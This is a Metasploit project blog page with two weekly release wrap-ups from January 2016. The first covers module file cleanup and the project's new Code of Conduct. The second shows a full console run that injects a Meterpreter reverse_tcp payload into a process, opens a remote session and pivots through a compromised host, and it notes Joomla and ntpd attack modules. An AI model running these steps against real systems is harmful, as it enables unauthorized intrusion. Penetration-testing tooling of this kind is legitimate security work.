Skip navigation
All Places > Metasploit > Blog > 2016 > January
2016
egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Jan 22, 2016

I'm not your mother, clean up after yourself.

 

An old friend of mine, axis2_deployer, is a fun authenticated code execution module that takes advantage of Axis2's ability to deploy new applications on a web server. It used to be a messy friend, leaving its files all over the living room floor for you to clean up manually. As of #6457, you don't have to worry about those files any more because it uses the FileDropper mixin. When you're writing a module that requires putting something on the file system, the polite thing to do is delete it when you're done and that's exactly what FileDropper is for. Just include the mixin and call register_file_for_cleanup with the remote path, and when a session is created Metsaploit will use it to delete your mess.

 

Code of Conduct

 

The wider development community has been talking about Codes of Conduct for a while now as a result of a lot of poor behavior. The Metasploit Project has been fortunate not to have had to deal with jerks on the scale that some other projects have, but in order to head those jerks off at the pass, Metasploit now has a Code of Conduct.

Here's an excerpt that explains the motivation:

  We are committed to making participation in this project a harassment-free   experience for everyone, regardless of level of experience, gender, gender   identity and expression, sexual orientation, disability, personal appearance,   body size, race, ethnicity, age, religion, or nationality.

This CoC provides a way for you to contact us and let us know about unacceptable behavior in the community as well as providing guidelines so people know what to expect when such things must be enforced.

  Project maintainers have the right and responsibility to remove, edit, or   reject comments, commits, code, wiki edits, issues, and other contributions   that are not aligned to this Code of Conduct, or to ban temporarily or   permanently any contributor for other behaviors that they deem inappropriate,   threatening, offensive, or harmful.

 

For developers and potential contributors, this means we've got your back. The goal is to give you confidence that if things go wrong, there is already a plan in place and rules that can help. I think it's also important to point out that there was zero dissent in the Pull Request discussion among current committers about whether to adopt this CoC. The building isn't currently on fire, but we as a community, and I personally, want you to be safe putting it out if one comes along.

 

The previous law of the land in the People's Republic of Metasploit was an informal adherance to Wheaton's Law, and that still stands. By adopting a more formal and explicit set of rules, we intend to foster a more welcoming environment where everyone feels comfortable making their first Pull Request.

 

New Modules

Auxiliary and post modules

 

Get it

 

As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff is available on GitHub: 4.11.6...4.11.7

 

Happy hacking.

egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Jan 11, 2016

Aaaaaand we're back! Last week was the first weekly update of the year and it comes with a super fun stuff.

Tunneling

The latest update allows you to tunnel reverse_tcp sessions over a compromised machine in a slightly less painful way. There is now a new datastore option, ReverseListenerComm, which lets you tell a meterpreter session tunnel connections back to your payload handler. Here's an example run to give you the idea:

 

msf exploit(payload_inject) > show options


Module options (exploit/windows/local/payload_inject):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   NEWPROCESS  true             no        New notepad.exe to inject to
   PID                          no        Process Identifier to inject of process to inject payload.
   SESSION                      yes       The session to run this module on. 

Payload options (windows/meterpreter/reverse_tcp):


   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: , , seh, thread, process, none)
   LHOST     127.0.0.1        yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:


   Id  Name
   --  ----
   0   Windows


msf exploit(payload_inject) > set ReverseListenerComm 1
ReverseListenerComm => 1

msf exploit(payload_inject) > set SESSION 1
SESSION => 1
msf exploit(payload_inject) > run 

[*] Started reverse handler on 127.0.0.1:4444 via the meterpreter on session 1
[*] Running module against WIN-2DE8F2QP867
[*] Launching notepad.exe...
[*] Preparing 'windows/meterpreter/reverse_tcp' for PID 3092
[*] Sending stage (884270 bytes)
[*] Meterpreter session 2 opened (192.168.5.101-192.168.5.1:4444 -> 127.0.0.1:63173) at 2015-05-20 00:09:44 +0100

meterpreter >

 

The really important line there is this:

[*] Started reverse handler on 127.0.0.1:4444 via the meterpreter on session 1

The compromised machine is listening on its localhost for the new connection, but it doesn't have to be localhost, you can tell it to listen on an external address and use psexec against a second internal machine. This used be possible by creating a route and setting your LHOST to a victim machine's IP address within that route, but it wasn't really clear how to do it and the settings were quite error prone; now it's just a single option to tell Metasploit explicitly where to listen for the payload.

Super fun modules

Joomla

This update comes with a pre-authentication exploit for Joomla, the popular CMS, another in a rich and storied history of deserialization bugs. We've also abstracted some common things into a Joomla mixin, so the next time one of these comes along, writing the exploit is will be faster and easier.

Hacking Time

hoff-hacking-time-500x333.jpg

From the module description:

The end goal is to cause ntpd to declare the legitimate peers "false tickers" and choose the attacking clients as the preferred peers, allowing these peers to control time.

Now you, too, can go... NAK to the Future!

 

Exploit modules

 

Auxiliary and post modules

 

 

As always, you can get all these modules and improvements with a simple msfupdate and the full diff is available on GitHub:  4.11.5-2015121501...4.11.5-2016010401

Filter Blog

By date: By tag: